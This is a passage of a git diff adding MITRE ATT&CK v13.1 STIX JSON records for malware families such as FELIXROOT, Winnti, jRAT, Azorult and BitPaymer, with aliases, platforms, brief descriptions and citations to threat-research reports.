+ } + ], + "modified": "2021-04-26T13:29:32.449Z", + "name": "LookBack", + "description": "[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--cf8df906-179c-4a78-bd6e-6605e30f6624.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--cf8df906-179c-4a78-bd6e-6605e30f6624.json new file mode 100644 index 0000000000000000000000000000000000000000..a3a22a4447e51a0a4d315a3aaf48a61eb1a071fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--cf8df906-179c-4a78-bd6e-6605e30f6624.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--e869ea72-4279-4e96-bb58-a20771b3f6f6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "FELIXROOT", + "GreyEnergy mini" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--cf8df906-179c-4a78-bd6e-6605e30f6624", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0267", + "external_id": "S0267" + }, + { + "source_name": "FELIXROOT", + "description": "(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)" + }, + { + "source_name": "GreyEnergy mini", + "description": "(Citation: ESET GreyEnergy Oct 2018)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html", + "description": "Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.", + "source_name": "FireEye FELIXROOT July 2018" + }, + { + "description": "Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "source_name": "ESET GreyEnergy Oct 2018" + } + ], + "modified": "2020-03-30T16:23:47.799Z", + "name": "FELIXROOT", + "description": "[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. 
(Citation: FireEye FELIXROOT July 2018)", + "x_mitre_version": "2.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--d3afa961-a80c-4043-9509-282cdf69ab21.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--d3afa961-a80c-4043-9509-282cdf69ab21.json new file mode 100644 index 0000000000000000000000000000000000000000..5cf0a5b5c1095d0cd48f1afde558cc6e4050722f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--d3afa961-a80c-4043-9509-282cdf69ab21.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--b229227f-8102-461a-b252-0842d26e1a61", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T22:02:53.982Z", + "name": "Winnti for Windows", + "description": "[Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "3.0", + "x_mitre_aliases": [ + "Winnti for Windows" + ], + "type": "malware", + "id": "malware--d3afa961-a80c-4043-9509-282cdf69ab21", + "created": "2017-05-31T21:33:21.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0141", + "external_id": "S0141" + }, + { + "source_name": "Microsoft Winnti Jan 2017", + "description": "Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/" + }, + { + "source_name": "Chronicle Winnti for Linux May 2019", + "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. 
Retrieved April 29, 2020.", + "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a" + }, + { + "source_name": "401 TRG Winnti Umbrella May 2018", + "description": "Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.", + "url": "https://401trg.github.io/pages/burning-umbrella.html" + }, + { + "source_name": "Kaspersky Winnti April 2013", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.", + "url": "https://securelist.com/winnti-more-than-just-a-game/37029/" + }, + { + "source_name": "Novetta Winnti April 2015", + "description": "Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.", + "url": "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c.json new file mode 100644 index 0000000000000000000000000000000000000000..4dfc577b83379eb88a3ccea1758fa358d5329ae5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--76654795-d020-4146-b735-4d72459f8fa6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Christiaan Beek, @ChristiaanBeek", + "Ryan Becwar" + ], + "x_mitre_aliases": [ + "TURNEDUP" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0199", + "external_id": "S0199" + }, + { + "source_name": "TURNEDUP", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + } + ], + "modified": "2021-02-09T15:25:33.116Z", + "name": "TURNEDUP", + "description": "[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. 
(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e066bf86-9cfb-407a-9d25-26fd5d91e360.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e066bf86-9cfb-407a-9d25-26fd5d91e360.json new file mode 100644 index 0000000000000000000000000000000000000000..270ba017f9f6ff80560167479e4e53a3b9ff9d96 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e066bf86-9cfb-407a-9d25-26fd5d91e360.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--09a5bdc2-0556-4d97-a1f4-6015168447e9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HTTPBrowser", + "Token Control", + "HttpDump" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360", + "type": "malware", + "created": "2017-05-31T21:32:46.445Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0070", + "external_id": "S0070" + }, + { + "source_name": "HttpDump", + "description": "(Citation: ThreatConnect Anthem)" + }, + { + "url": "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "description": "Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.", + "source_name": "ThreatStream Evasion Analysis" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "url": "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", + "description": "ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.", + "source_name": "ThreatConnect Anthem" + } + ], + "modified": "2020-03-20T02:22:13.185Z", + "name": "HTTPBrowser", + "description": "[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. 
(Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e48df773-7c95-4a4c-ba70-ea3d15900148.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e48df773-7c95-4a4c-ba70-ea3d15900148.json new file mode 100644 index 0000000000000000000000000000000000000000..e93fcb9a4eda757a047f57c9ada52642a4d8bc8e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e48df773-7c95-4a4c-ba70-ea3d15900148.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--612ecac1-1241-4c44-919a-6741ed7f9a5f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "DownPaper" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0186", + "external_id": "S0186" + }, + { + "source_name": "DownPaper", + "description": "(Citation: ClearSky Charming Kitten Dec 2017)" + }, + { + "source_name": "ClearSky Charming Kitten Dec 2017", + "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" + } + ], + "modified": "2020-03-30T15:31:30.330Z", + "name": "DownPaper", + "description": "[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e9595678-d269-469e-ae6b-75e49259de63.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e9595678-d269-469e-ae6b-75e49259de63.json new file mode 100644 index 0000000000000000000000000000000000000000..e580d69df39cd9c86e0fda358b5081b7155f10f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--e9595678-d269-469e-ae6b-75e49259de63.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--eba391a5-5356-4cc9-93e9-290b0febdef1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BADNEWS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e9595678-d269-469e-ae6b-75e49259de63", + "type": "malware", + "created": "2017-05-31T21:33:14.118Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0128", + "external_id": "S0128" + }, + { + "source_name": "BADNEWS", + "description": "(Citation: Forcepoint Monsoon)" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "modified": "2021-06-21T12:32:12.581Z", + "name": "BADNEWS", + "description": "[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. 
(Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c.json new file mode 100644 index 0000000000000000000000000000000000000000..023a0476bdead0bfd4d864da5b9fc08fd84aa20c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c.json 
@@ -0,0 +1,108 @@ +{ + "type": "bundle", + "id": "bundle--7dc6c674-7187-40bb-af3c-38a286204305", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "jRAT", + "JSocket", + "AlienSpy", + "Frutas", + "Sockrat", + "Unrecom", + "jFrutas", + "Adwind", + "jBiFrost", + "Trojan.Maljava" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0283", + "external_id": "S0283" + }, + { + "source_name": "jRAT", + "description": "(Citation: jRAT Symantec Aug 2018)" + }, + { + "source_name": "JSocket", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "AlienSpy", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Frutas", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Sockrat", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Unrecom", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "jFrutas", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "Adwind", + "description": "(Citation: Kaspersky Adwind Feb 2016)" + }, + { + "source_name": "jBiFrost", + "description": "(Citation: NCSC Joint Report Public Tools)" + }, + { + "source_name": "Trojan.Maljava", + "description": "(Citation: jRAT Symantec Aug 2018)" + }, + { + "description": "Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. 
Retrieved April 23, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf", + "source_name": "Kaspersky Adwind Feb 2016" + }, + { + "source_name": "jRAT Symantec Aug 2018", + "description": "Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques" + }, + { + "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.", + "url": "https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools", + "source_name": "NCSC Joint Report Public Tools" + } + ], + "modified": "2021-01-25T15:43:45.842Z", + "name": "jRAT", + "description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)", + "x_mitre_version": "2.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e.json new file mode 100644 index 0000000000000000000000000000000000000000..fbfed8ff07e71da53c02a17a0feb6d0e3e3d866a 
--- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--440f3f8b-289b-460e-977d-c1c8063c7706", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Comnie" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0244", + "external_id": "S0244" + }, + { + "source_name": "Comnie", + "description": "(Citation: Palo Alto Comnie)" + }, + { + "source_name": "Palo Alto Comnie", + "description": "Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/" + } + ], + "modified": "2020-03-30T15:25:11.871Z", + "name": "Comnie", + "description": "[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f99f3dcc-683f-4936-8791-075ac5e58f10.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f99f3dcc-683f-4936-8791-075ac5e58f10.json new file mode 100644 index 0000000000000000000000000000000000000000..35982a950845f9cfc8f3095f1c4fe8a57537efed --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f99f3dcc-683f-4936-8791-075ac5e58f10.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--1b67f73c-50dc-47b8-b7bd-c50f5cbbd212", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:51:42.922Z", + "name": "LoudMiner", + "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "LoudMiner" + ], + "type": "malware", + "id": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10", + "created": "2020-05-18T21:01:51.045Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0451", + "external_id": "S0451" + }, + { + "source_name": "ESET LoudMiner June 2019", + "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.", + "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080.json new file mode 100644 index 0000000000000000000000000000000000000000..6951b292aab0e8c236273d136072a8bd4ff44061 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3a7fff35-08aa-40df-bd84-16707cbd7c94", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:42:52.174Z", + "name": "Azorult", + "description": "[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.\nIn July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Azorult" + ], + "type": "malware", + "id": "malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080", + "created": "2019-01-30T15:19:14.309Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0344", + "external_id": "S0344" + }, + { + "source_name": "Azorult", + "description": "(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)" + }, + { + "source_name": "Proofpoint Azorult July 2018", + "description": "Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + }, + { + "source_name": "Unit42 Azorult Nov 2018", + "description": "Yan, T., et al. (2018, November 21). 
New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fa766a65-5136-4ff3-8429-36d08eaa0100.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fa766a65-5136-4ff3-8429-36d08eaa0100.json new file mode 100644 index 0000000000000000000000000000000000000000..75487da3fa6aa2fc3068957cbb6554ec80ee096c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fa766a65-5136-4ff3-8429-36d08eaa0100.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--731c2ce8-f27f-4f99-83be-afa3f57378ab", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BitPaymer", + "wp_encrypt", + "FriedEx" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fa766a65-5136-4ff3-8429-36d08eaa0100", + "type": "malware", + "created": "2021-02-08T22:19:19.340Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0570", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0570" + }, + { + "source_name": "BitPaymer", + "description": "(Citation: Crowdstrike Indrik November 2018)" + }, + { + "source_name": "wp_encrypt", + "description": "(Citation: Crowdstrike Indrik November 2018)" + }, + { + "source_name": "FriedEx", + "description": "(Citation: Crowdstrike Indrik November 2018)" + }, + { + "source_name": "Crowdstrike Indrik November 2018", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "description": "Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021." + } + ], + "modified": "2021-04-26T22:04:32.509Z", + "name": "BitPaymer", + "description": "[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. 
